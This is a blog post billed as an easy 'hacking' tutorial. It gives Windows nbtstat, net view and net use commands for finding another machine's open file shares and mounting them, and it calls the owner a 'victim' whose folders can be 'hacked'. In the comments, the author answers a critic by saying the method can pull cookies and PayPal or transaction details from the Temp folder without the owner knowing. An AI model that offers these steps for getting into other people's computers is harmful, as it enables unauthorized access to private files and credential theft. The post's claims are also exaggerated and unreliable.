The art of HACKING!!… Ain’t that tough really!

It’s a common perception that hacking is a very tedious and time consuming process involving loads of complications, however it isn’t so! All it takes is SOLID brain, a vulnerable system than can be hacked and just a few seconds!! Discover the process…

As usual start the proceedings in the following manner-


Click “Start -> Run -> cmd

At Dos Prompt ->

Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]

This will give you a read out that looks like this->

NetBIOS Remote Machine Name Table

The following is an example-

Name Type Status

————————————-
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__ <01> GROUP Registered
———————————————–

The numbers in the <> are hex code values. What we are interested in is the “Hex Code” number with <20>.

A hex code of <20> means you have file and printer sharing turned on!

Next step is to find out what is being shared->

Net view \\
[e.g : net view \\207.175.1.1]

You will then get a response that looks similar to this->

Shared resources at \\ip_address
Sharename Type Comment


______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)

This indicates that you have gained access to your potential victim’s My Documents Folder as well as their Temp directory.

To get access to those folders next command ->

Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]

If all goes well for you, you will then get a response of
(The command was completed successfully.)

That’s it!! You are all set to HACK the latest contents of your victim’s Temp folder!!

Go try it out :)

Related posts:

  1. 11 Unix Tricks
  2. iX104C4… Tablet PC for all careless & rough-n-tough PC owners!!
  3. C code snippet to generate Kaprekar’s magical constant 6174
  4. Windows 7 Installation Problems – During Expanding Files
  5. How to Create Desktop Shortcuts on Windows XP that Microsoft Left Out!!

Filed Under: Archive Categories

About the Author

Om is a dynamic entrepreneur, renowned author, and founder of Webfosys Networks Pvt Ltd that provides IT, content creation, SEO & Website Design services to several clients across the globe. He has written over 12,000 articles, and loves to write Tech Reviews and Auto Reviews Reach him 24/7 - om.thoke86@gmail.com

Comments (2)

Trackback URL | Comments RSS Feed

  1. mike says:

    This is not hacking, this is accessing windows shares. Please stop making a fool of yourself with this garbage.

  2. om says:

    Well as a matter of fact you are indeed correct! It is windows sharing after all but, you can of course access what you want to… And there are high chances that the other person wouldn’t be aware of it!! Had professional hacking been so easily, then by now some one would have already hacked your PC totally!!

    Even there are other similar things that can be regarded as windows sharing itself, but people use it to gain access to privileged documents of the other persons like online transactions and cookies that gets saved on the temp folder!

    So there’s a possibility of accessing precious details like paypal account or other stuff while a person is online & isn’t aware of the fact that you are using that info… So it can be called HACKING in a vague sense… I am not claiming that it is real hacking, but can serve a similar purpose undoubtedly.. :)

Leave a Reply




If you want a picture to show with your comment, go get a Gravatar.